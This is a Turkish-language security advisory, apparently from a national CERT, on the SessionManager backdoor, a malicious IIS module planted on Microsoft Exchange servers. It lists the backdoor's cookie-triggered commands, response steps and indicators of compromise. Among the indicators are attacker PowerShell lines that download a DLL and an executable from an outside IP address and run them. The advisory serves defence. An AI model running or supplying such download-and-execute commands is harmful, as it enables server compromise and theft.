SessionManager
TanımDünya genelinde Microsoft Exchange sunucuları hedef alınarak SessionManager adlı zararlı arka kapıların yerleştirildiği ve saldırganların bu arka kapılar aracılığıyla iç ağda yayılabildikleri tespit edilmiştir.
SessionManager C++ dilinde geliştirilen zararlı içerikli bir IIS modülüdür. Session Managerın amacı IIS uygulamaları tarafından hedef sistemlere yüklenilmeyi sağlamaktır.
SALDIRI VEKTÖRÜ
SessionManager isimli zararlı yazılım, dünya genelinde çeşitli kuruluşlara ait Microsoft Exchange mail sunucularını ele geçirmek için "ProxyLogon" tipi güvenlik açıklıklarından yararlandıktan sonra sunucuda kalıcılık sağlamak için saldırganlar tarafından kullanılmaktadır. Kaspersky güvenlik araştırmacıları tarafından isimlendirildiği şekliyle SessionManager, bir zararlı IIS modülü olarak keşfedilmiştir. Daha önceden herhangi bir kullanıcının OWA (Outlook Web Access) ile oturum açtığı esnada kullanmış olduğu kullanıcı adı ve parola bilgisini ele geçiren bir IIS modülü olan Owowayı hatırlatan SessionManager zararlısının ayırt edici bir özelliği ise gizli olarak kalıcılık sağlayabiliyor olmasıdır. SessionManagerın çoğunlukla kamu kurumları ve savunma sanayi alanında çalışan kuruluşları hedef aldığı bilinmektedir.
TESPİT VE ÖNLEMLER
Farklı SessionManager modüllerinin incelenmesi sonucunda aşağıdaki tespitler yapılmıştır:
1. En eski olan ve derlenme tarihi Mart 2021 olan ilk örneğinde C:UsersGodLikeDesktoptt4StripHeadersmasterx64Rel easesessionmanagermodule.pdb isimli PDB dosya yolunun bulunduğu görülmektedir.
2. Derlenme tarihi Nisan 2021 V1 örneğinde C:UsersGodLikeDesktoptt4SessionManagerModulex64Re leasesessionmanagermodule.pdb şeklinde bir PDB dosya yolu tespit edilmiştir.
3. Derlenme tarihi Ağustos 2021 olan V2 örneğinde V1 örneğindeki dosya yoluna rastlanmakla beraber SessionManagerV2Module isimli proje klasörüne rastlanmıştır.
4. Derlenme tarihi Eylül 2021 olan V3 örneğinde ise SessionManagerV3Module isimli proje klasörüne rastlanmıştır.
WEB Server HTTP iletişimine müdahale eden Session Manager, sunucunun istemciye gönderdiği http cevabını değiştirmektedir. Session Manager V2 versiyonu hariç olmak üzere istemciden gelen SM_SESSIONID ve V2den sonra SM_SESSION cookie ismine bakmaktadır. Bu cookie isimlerine bağlı olarak SessionManager tarafından kod çalıştırılmaktadır. Zararlı yazılım aşağıdaki çerez değerleri ile sunucu üzerinde çeşitle komutlar çalıştırmaktadır:
SM_SESSION=GETFILE
SM_SESSION=PUTFILE
SM_SESSION=DELETEFILE
SM_SESSION=FILESIZE
SM_SESSION=CMD
SM_SESSION=PING
SM_SESSION=S5CONNECT
SM_SESSION=S5WRITE
SM_SESSION=S5READ
SM_SESSION=S5CLOSE
ProxyLogon tipindeki zafiyetlerin tespitine yönelik olarak sistemlerde kurulu IIS modüllerin listesini elde etmek için https://docs.microsoft.com/en-us/iis...he-iis-manager adresindeki yönergeler veya IIS appcmd komut satırı https://docs.microsoft.com/en-us/iis...e-command-line adresindeki gibi kullanılmalıdır.
Aşağıda yer alan zararlı yazılıma ait izlerden herhangi birinin fark edilmesi durumunda aşağıdaki adımlar uygulanmalıdır:
1. Siber olay müdahale çalışmaları başlatılmalı.
2. Zararlı yazılımdan etkilenen sistemler mevcut ağdan izole edilmeli.
3. Etkilenen sistemlerin ram ve disk imajları alınmalı.
4. Konuyla ilgili USOMa ivedilikle bilgi verilmeli.
5. Kurum içerisindeki ilgili sistem ve ağ iz kayıtlarından enfekte olmuş sistemler üzerinden gerçekleşen hareketler incelenmeli ve olası yatayda yayılma eğilimleri tespit edilmelidir.
6. Enfekte olan ve yatayda ilerlemenin tespit edildiği tüm sistemlerde siber olay müdahale çalışması yapılması ve sıfırdan temiz kurulum gerçekleştirilmelidir.
7. Kurum içerisindeki tüm IIS ve Microsoft Exchange sunucuları son sürüme yükseltilmelidir.
İZLER
Zararlı Hash Bilgileri
5FFC31841EB3B77F41F0ACE61BECD8FD - (stripheaders.dll)
84B20E95D52F38BB4F6C998719660C35 - (stripheaders.dll)
4EE3FB2ABA3B82171E6409E253BDDDB5 - (stripheaders.dll)
2410D0D7C20597D9B65F237F9C4CE6C9
95EBBF04CEFB39DB5A08DC288ADD2BBC
F189D8EFA0A8E2BEE1AA1A6CA18F6C2B
65DE95969ADBEDB589E8DAFE903C5381
235804E3577EA3FE13CE1A7795AD5BF9
30CDA3DFF9123AD3B3885B4EA9AC11A8
5F15B17FA0E88D40D4E426E53CF94549
Files paths
%PROGRAMFILES%MicrosoftExchange
ServerV15ClientAccessOWAAuthSessionManagerModule.d ll
%PROGRAMFILES%MicrosoftExchange
ServerV15FrontEndHttpProxybinSessionManagerModule. dll
%WINDIR%System32inetsrvSessionManagerModule.dll
%WINDIR%System32inetsrvSessionManager.dll
C:WindowsTempExchangeSetupExch.ps1
C:WindowsTempExch.exe
C:WindowsTempvmmsi.exe
C:WindowsTempsafenet.exe
C:WindowsTempupgrade.exe
C:WindowsTempexupgrade.exe
C:WindowsTempdvvm.exe
C:WindowsTempvgauth.exe
C:WindowsTempwin32.exe
PDB Dosya Yolları
C:UsersGodLikeDesktoptt4StripHeadersmasterx64Rele asesessionmanagermodule.pdb
C:UsersGodLikeDesktoptt4SessionManagerModulex64Rel easesessionmanagermodule.pdb
C:UsersGodLikeDesktoptt4SessionManagerV2Modulex64R eleasesessionmanagermodule.pdb
C:UsersGodLikeDesktoptt4SessionManagerV3Modulex64R eleasesessionmanagermodule.pdb
C:UsersGodLikeDesktoptt0Hook-PasswordChangeNotifymasterHookPasswordChangex64Re leaseHookPasswordChange.pdb
Komutlar
powershell "(New-Object
Net.WebClient).DownloadFile('hxxp://202.182.123[.]185/Dll2.dll','C:WindowsTempwin32.dll')"
powershell "(New-Object
Net.WebClient).DownloadFile('hxxp://202.182.123[.]185/ssp.exe','C:WindowsTempwin32.exe')"
C:WindowsTempwin32.exe C:WindowsTempwin32.dll
IP Adresleri
202.182.123[.]185
207.148.109[.]111